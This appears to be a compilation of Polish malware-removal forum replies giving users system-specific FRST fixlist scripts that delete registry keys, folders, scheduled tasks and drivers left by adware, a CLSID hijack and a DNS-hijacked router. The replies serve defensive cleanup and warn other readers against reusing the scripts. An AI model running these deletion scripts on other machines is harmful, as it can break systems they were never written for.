picasso

Posprzątałam duplikaty. Dostarczone raporty nie są poprawne. Brakuje pliku FRST.txt. Poproszę o prawidłowe zrobienie nowych raportów FRST (Addition.txt, FRST.txt, Shortcut.txt): KLIK. Poza tym używałeś jakiś skrypt FRST i robiłeś oderwane od rzeczywistości szukanie w FRST - nie wiadomo co to ma znaczyć i po co to było.

Są tu dwa problemy: hijack rejestracji CLSID oraz infekcja routera. Poniższy adres nie jest polski: Tcpip\Parameters: [DhcpNameServer] 79.143.82.186 8.8.8.8 Akcje do przeprowadzenia: 1. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony: 2. Odinstaluj starą dziurawą wersję Java 7 Update 45. Następnie otwórz Notatnik i wklej w nim: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe CustomCLSID: HKU\S-1-5-21-3061280923-3253570267-2657071582-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\spwizimg.dll (Windows ® Codename Longhorn DDK provider) RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8} CMD: ipconfig /flushdns EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Podaj model routera. I wypowiedz się czy problemy nadal występują.

Brakuje pliku fixlog.txt z wynikami skryptu (powinien być tam skąd uruchamiałeś FRST). A wszystkie logi proszę umieść jako załączniki forum.

Brak widocznych oznak infekcji... Za to notuję sterowniki Kasperskiego pozostałe po niepoprawnie odinstalowanym antywirusie ZoneAlarm. Na razie wykonaj te działania: 1. Deinstalacje: - Wejdź w Tryb awaryjny Windows i zastosuj Kaspersky Remover. Po użyciu programu opuść Tryb awaryjny. - Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście wpis ZoneAlarm Antivirus > Dalej. - Poprzez Panel sterowania odinstaluj starą wersję Adobe Flash Player 15 ActiveX oraz zbędny program zainstalowany jako sponsor produktów Adobe McAfee Security Scan Plus. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: S3 cpuz130; \??\C:\Users\Adrian\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X] S3 cpuz135; \??\C:\Windows\TEMP\cpuz135\cpuz135_x64.sys [X] S3 cpuz137; \??\C:\Windows\TEMP\cpuz137\cpuz137_x64.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] Winlogon\Notify\igfxcui: igfxdev.dll [X] HKU\S-1-5-21-4162316270-4102970208-303935742-1000\...\MountPoints2: {9d0a26f5-cb2a-11e3-b7f0-94de80bc51f2} - E:\Aoesetup.exe HKU\S-1-5-18\...\Run: [ZoneAlarm Windows 10 Upgrader] => "C:\ProgramData\CheckPoint\ZoneAlarm\Data\Updates\unpacked==win10=update_win10.zip\upgrade.exe" /delay DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxps://fpdownload.macromedia.com/get/shockwave/cabs/flash/swflash.cab FF user.js: detected! => C:\Users\Adrian\AppData\Roaming\Mozilla\Firefox\Profiles\lbvjhhn7.default\user.js [2014-05-28] FF Extension: Avira Browser Safety - C:\Users\Adrian\AppData\Roaming\Mozilla\Firefox\Profiles\lbvjhhn7.default\Extensions\abs@avira.com.xpi [2016-01-25] C:\Program Files (x86)\ESET C:\Users\Adrian\AppData\Local\Google C:\Users\Adrian\AppData\Local\Microsoft\Windows\GameExplorer\{D69B9A91-89BC-4FB2-A3AE-BB7014DAC94A} C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AlcoholAutomount DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LogMeIn Hamachi Ui DisableService: PAExec CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Wypowiedz się czy są jakieś pozytywne zmiany.

Raport FRST nie został skonfigurowany wg wytycznych - opcje "List BCD" + "Drivers MD5" nie miały być zaznaczone. Wiele problemów. Po pierwsze ustawione proxy. Po drugie cała przeglądarka Google Chrome jest zmodyfikowana, przekształcona w wersję typu "development" i konieczna reinstalacja przeglądarki od zera. Próbując rozwiązć problem posługiwałeś się wątpliwymi skanerami SpyHunter i YAC. Działania do przeprowadzenia: 1. Odinstaluj: - Adware/PUP: MyBestOffersToday 005.014010221, Registry Reviver, Setup, WarThunder. - Stare wersje: Adobe Flash Player 16 ActiveX, Adobe Flash Player 18 NPAPI, Adobe Flash Player 20 PPAPI, Adobe Reader 9.5.0 - Polish, Akamai NetSession Interface, Java 8 Update 25 (64-bit), Java 8 Update 25, Java 8 Update 31 (64-bit), Java 8 Update 31, Spybot - Search & Destroy, SUPERAntiSpyware. 2. Akcje tyczące Google Chrome: Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Na razie nie instaluj Google Chrome, gdyż skrypt poniżej doczyści elementy przeglądarki. 3. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {2F0A17E4-7353-4EBE-8B2F-39977FAEB8A5} - System32\Tasks\{84DE5E78-64CC-4A0D-92B7-88D961F5C156} => pcalua.exe -a F:\Setup.now.exe -d F:\ Task: {406C6749-7890-4CC4-9DB1-353B06E95C66} - System32\Tasks\WarThunder24 => Chrome.exe hxxp://mmotraffic.com/catalog/goplay/1000932/MTE3NjYvLy8xMDAwOTMy?click_id=zytDtB0BtAyE0A0EtB0E0BzytA0FtB0C2RtBtDtCyCtDtCtBzytCtBtCzzyEyCtDyEyD Task: {43FA161D-F091-4096-A03E-DAC574D8402C} - System32\Tasks\{467EDC5A-3E11-463C-B245-C79B5C9F97AA} => pcalua.exe -a C:\Users\KAAM\Desktop\RTLTOOL\WIN7\64\EXE\RtlStartInstall.exe -d C:\Users\KAAM\Desktop\RTLTOOL\WIN7\64\EXE Task: {5A686041-99BA-457F-932C-933623B753DB} - System32\Tasks\{BEE96EE5-2A4D-4132-9013-52A9A02C10E8} => pcalua.exe -a "D:\Program Files (x86)\Raggot\wormsarm\RegSetup.exe" -d "D:\Program Files (x86)\Raggot\wormsarm" Task: {62448B39-897E-4B62-A52E-26D9E879064E} - System32\Tasks\{1488BBFF-48DE-470A-9A0C-09CC17C389C2} => pcalua.exe -a "D:\Program Files (x86)\IxGxI\IGI 2 PL[ExtremeB14]\Project IGI 2-CovertStrike.exe" -d "D:\Program Files (x86)\IxGxI\IGI 2 PL[ExtremeB14]" Task: {8D50850F-5A7C-4F88-A104-7E7C221CAFCF} - System32\Tasks\WarThunder sat => Chrome.exe hxxp://mmotraffic.com/catalog/goplay/1000932/MTE3NjYvLy8xMDAwOTMy?click_id=zytDtB0BtAyE0A0EtB0E0BzytA0FtB0C2RtBtDtCyCtDtCtBzytCtBtCzzyEyCtDyEyD Task: {BCAB20DE-C253-490E-A08F-C9C63B2EE8E9} - System32\Tasks\WarThunder sun => Chrome.exe hxxp://mmotraffic.com/catalog/goplay/1000932/MTE3NjYvLy8xMDAwOTMy?click_id=zytDtB0BtAyE0A0EtB0E0BzytA0FtB0C2RtBtDtCyCtDtCtBzytCtBtCzzyEyCtDyEyD Task: {BFA8EEAE-86B3-4A65-B030-6C46FD839053} - System32\Tasks\{E9768EB2-1BEC-4648-9E72-6992B17621BF} => pcalua.exe -a F:\DOW_DC\directx\dxsetup.exe -d F:\DOW_DC\directx Task: {CADC321B-FCB3-43C9-B0D0-545209BF438A} - System32\Tasks\{932B773E-958E-4F65-8308-9FCDB155739A} => pcalua.exe -a "D:\Program Files (x86)\Spellforce 2 - Czas Mrocznych Wojen\Spellforce 2_1.2a-1.2_poprawka.exe" -d "D:\Program Files (x86)\Spellforce 2 - Czas Mrocznych Wojen" Task: {E6E9DC69-AB39-4708-8129-B7EE309B59BA} - System32\Tasks\{A7887154-DFE0-4FFC-8E1A-EE7427B7F116} => pcalua.exe -a "D:\Program Files (x86)\Spellforce 2 - Czas Mrocznych Wojen\base\data\Spellforce 2_1.2a-1.2_poprawka.exe" -d "D:\Program Files (x86)\Spellforce 2 - Czas Mrocznych Wojen\base\data" HKLM-x32\...\RunOnce: [upmbot_be_014010221.exe] => C:\Users\KAAM\AppData\Local\mbot_be_014010221\upmbot_be_014010221.exe [3278000 2016-01-28] () Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X] BootExecute: autocheck autochk * BootDefrag.exesdnclean64.exe R1 DMProtect; C:\Windows\System32\DRIVERS\DMProtect64.sys [28416 2015-07-10] () S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-01-21] () U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2016-01-25] () U2 ADSafeSvc; no ImagePath S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 TEAM; system32\DRIVERS\RtTeam60.sys [X] S2 tsnethlpx64; \??\C:\Program Files (x86)\Tencent\QQPCMgr\11.1.16908.217\TsNetHlpX64.sys [X] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = google.pl HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = google.pl HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = google.pl HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = google.pl HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-4156027226-2253448997-1576552463-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} HKU\S-1-5-21-4156027226-2253448997-1576552463-1000\Software\Microsoft\Internet Explorer\Main,Start Page = Google.pl HKU\S-1-5-21-4156027226-2253448997-1576552463-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxps://www.google.com/?trackid=sp-006 SearchScopes: HKLM -> DefaultScope {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} SearchScopes: HKU\S-1-5-21-4156027226-2253448997-1576552463-1000 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.google.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-4156027226-2253448997-1576552463-1000 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q={searchTerms} DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxps://fpdownload.macromedia.com/get/shockwave/cabs/flash/swflash.cab StartMenuInternet: IEXPLORE.EXE - iexplore.exe FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\Google\Chrome DeleteKey: HKCU\Software\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} DeleteKey: HKCU\Software\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\mbot_be_014010221 DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SDTray DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SpybotPostWindows10UpgradeReInstall DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\upmbot_be_014010221.exe DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Safer-Networking DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D} DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96} DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains RemoveDirectory: C:\AdwCleaner C:\Program Files (x86)\Enigma Software Group C:\Program Files (x86)\Google\Chrome C:\Program Files (x86)\mbot_be_014010221 C:\Program Files\Common Files\AV\Spybot - Search and Destroy C:\ProgramData\Malwarebytes C:\ProgramData\RogueKiller C:\ProgramData\TEMP C:\ProgramData\Microsoft\Windows\GameExplorer\{E3D0E901-E875-44B1-A0F7-52A589F0160C} C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MYBESTOFFERSTODAY C:\Users\KAAM\AppData\Local\Chromium C:\Users\KAAM\AppData\Local\Google\Chrome C:\Users\KAAM\AppData\Local\mbot_be_014010221 C:\Users\KAAM\AppData\Roaming\DiskDefrag C:\Users\KAAM\AppData\Roaming\Mozilla C:\Users\KAAM\AppData\Roaming\WarThunder C:\Users\KAAM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\.lnk C:\Users\KAAM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk C:\Users\KAAM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\WarThunder.lnk C:\Users\KAAM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder.lnk C:\Users\KAAM\Desktop\Non-important Content\Adobe Reader 9.lnk C:\Users\KAAM\Desktop\Non-important Content\Kaam - Chrome.lnk C:\Users\KAAM\Desktop\Non-important Content\Osoba 1 - Chrome.lnk C:\Users\KAAM\Desktop\Non-important Content\* (*).lnk C:\Users\KAAM\Downloads\adwcleaner*.exe C:\Users\KAAM\Downloads\ExecutionGuard.zip C:\Users\KAAM\Downloads\Malwarebytes Anti-Malware Premium 2.0.2.1012 Key.rar C:\Users\KAAM\Downloads\Spy*.* C:\Users\KAAM\Links\Desktop (2).lnk C:\Users\KAAM\Links\Desktop (3).lnk C:\Users\Public\Desktop\Post Win10 Spybot-install.exe C:\Windows\4FC9DA9DF608454E8191D7EFFDCC5726.TMP C:\Windows\system32\ExecutionGuard.dll C:\Windows\system32\log C:\Windows\system32\drivers\DMProtect64.sys C:\Windows\system32\drivers\EsgScanner.sys C:\Windows\system32\drivers\iSafeKrnlBoot.sys C:\Windows\system32\drivers\TrueSight.sys C:\Windows\system32\drivers\etc\hosts*.backup CMD: netsh advfirewall reset Hosts: RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\KAAM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 5. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Po tej niechcianej instalacji Privoxy pozostało tylko jedno czynne zadanie w Harmonogramie (PC Defender) oraz odpadkowe obiekty na dysku. Działania do przeprowadzenia: 1. Deinstalacje: - Odinstaluj starą wersję Java 8 Update 31. - W Google Chrome odinstaluj rozszerzenie Adblock Super. Z jakiegoś względu zostało usunięte z Chrome Web Store. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {780555DF-E9F3-4183-8C36-C0FFDBF29D00} - System32\Tasks\PC Defender Uninstaller => C:\Program Files (x86)\PC Defender\PCDefender.exe [2015-10-09] (Backup Updater) Task: {7BD4F717-6DD9-4A44-B74E-F7419D2112EA} - System32\Tasks\{087878FD-F212-4533-8197-8537AD8B91EB} => pcalua.exe -a C:\Users\HP\Downloads\sp63709.exe -d C:\Users\HP\Downloads Task: {EBE8EB1A-1CF9-4255-90E0-EBD631907956} - System32\Tasks\{5A817991-3257-40F3-8A28-F630B1BB8220} => C:\Users\HP\Downloads\Hearthstone-Setup-plPL (2).exe [2015-07-23] (Blizzard Entertainment) Task: {EE2489CD-5C80-420E-BBF4-ADD0670B50FA} - \Malware Cleaner -> Brak pliku HKU\S-1-5-21-1324791437-3742843323-2610589818-1000\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-1324791437-3742843323-2610589818-1000\...\Run: [spybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.) S3 cpuz136; \??\C:\Users\HP\AppData\Local\Temp\cpuz136\cpuz136_x64.sys [X] S3 DIRECTIO; \??\C:\Program Files\PerformanceTest\DirectIo64.sys [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] GroupPolicyScripts: Ograniczenia CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKLM-x32 -> DefaultScope {20B9D1AE-AD1A-38B4-87FE-AF278DA9861D} URL = SearchScopes: HKU\S-1-5-21-1324791437-3742843323-2610589818-1000 -> DefaultScope {20B9D1AE-AD1A-38B4-87FE-AF278DA9861D} URL = FF Homepage: hxxps://www.malwarebytes.org/restorebrowser//?u=2acc6d0eaf50f18e51762cfb63ff29fb&c=p1&src=hp&inst=1453550315 CHR StartupUrls: Default -> "hxxps://search.protectedio.com/?u=2acc6d0eaf50f18e51762cfb63ff29fb&c=p1&src=hp&inst=1452893630" DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks RemoveDirectory: C:\Program Files\Common Files\AV\Spybot - Search and Destroy RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins RemoveDirectory: C:\Program Files (x86)\PC Defender RemoveDirectory: C:\Users\HP\AppData\Roaming\Mighty Cleaner C:\ProgramData\Benchmarking.exe C:\Users\HP\AppData\Roaming\*.tmp C:\Users\HP\AppData\Roaming\Microsoft\Windows\SendTo\Android (ALLPlayer Pilot).lnk C:\Users\HP\Desktop\Gry\Glyph.lnk C:\Users\HP\Desktop\Programy\ALLPlayer.Radio.lnk C:\Users\HP\Desktop\Programy\ALLPlayer.VOD.lnk C:\Users\HP\Desktop\Programy\CodeBlocks.lnk C:\Users\HP\Desktop\Programy\Free PDF to Word Doc Converter.lnk C:\Users\HP\Desktop\Programy\HitLeap Viewer.lnk C:\Users\HP\Desktop\Programy\Huawei E3272.lnk C:\Users\HP\Desktop\Programy\McAfee Security Scan Plus.lnk C:\Users\HP\Desktop\Programy\PerformanceTest.lnk C:\Users\HP\Desktop\Programy\Testy Liwona kategoria B.lnk CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Opisz czy nadal występują problemy.

W raportach brak oznak infekcji. Przedstaw raport z MBAM pokazujący gdzie wykrył tego trojana (dokładna ścieżka dostępu i nazwa zagrożenia).

Wszystko zrobione. Na koniec zastosuj DelFix oraz wyczyść punkty Przywracania systemu: KLIK.

Skrypt pomyślnie wykonany, problem adware powinien ustąpić, ale jeszcze poprawki na zawartość uprzednio pustego FRST.txt: Otwórz Notatnik i wklej w nim: HKLM\...\Run: [] => [X] HKLM-x32\...\Run: [] => [X] ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => Brak pliku BHO: Brak nazwy -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> Brak pliku DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AVAST Software DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\McAfee DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files\mcafee RemoveDirectory: C:\Program Files\Common Files\McAfee RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox RemoveDirectory: C:\ProgramData\AVAST Software RemoveDirectory: C:\ProgramData\McAfee RemoveDirectory: C:\Users\Angelika\AppData\Local\DownplaysFireplaces RemoveDirectory: C:\Users\Angelika\AppData\Local\Mozilla RemoveDirectory: C:\Users\Angelika\AppData\Roaming\Mozilla RemoveDirectory: C:\WINDOWS\System32\Tasks\AVAST Software RemoveDirectory: C:\WINDOWS\System32\Tasks\McAfee Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Powstanie kolejny fixlog.txt. Przedstaw go. Nowe skany FRST nie są potrzebne.

Plik FRST.txt jest całkowicie pusty (niepoprawnie zapisany), więc pełna analiza niemożliwa. Na razie usunę tylko problem tytułowy, bo akurat ten wpis jest w Addition - Price-problem produkuje zadanie AngelikaDownplaysFireplacesV2. Działania do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: {222E2C41-F34D-48FF-A6CD-1EE875DFAFDA} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {2D09D88E-10F8-4CB6-8265-CB64EE2296D4} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {2E95E5A3-D8A1-4325-AF0E-1557921FBEEE} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku Task: {3E3FECE3-873C-456B-80B7-74F2B1A00AE7} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> Brak pliku Task: {9E09FD6B-8B03-49A3-8D3B-CB2A74EDAD5C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {9E303F1D-6AC4-4D99-B406-F8CDD8932B83} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku Task: {B71EDB6D-CB62-499C-9785-10B2DCD0C8C3} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {C12092E9-B899-4A87-B1A1-2B469C7035BA} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {C724ECB0-55D6-43FE-8B0D-8092BCC1F607} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {C93526F1-BFBC-41FF-A15F-A3751529ED03} - System32\Tasks\AngelikaDownplaysFireplacesV2 => Rundll32.exe YodellersRegauges.dll,main 7 1 Task: {D1B83FAC-2A27-4DEA-9EE0-E305A89EBE5D} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {DDBA04FB-4E70-41C8-94B5-587678310078} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {E80CC54D-3C18-4041-AAB6-738468C9C4AB} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {E822E9CF-80BB-43D2-8E95-F66166E612F3} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools\7-Zip*.lnk EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

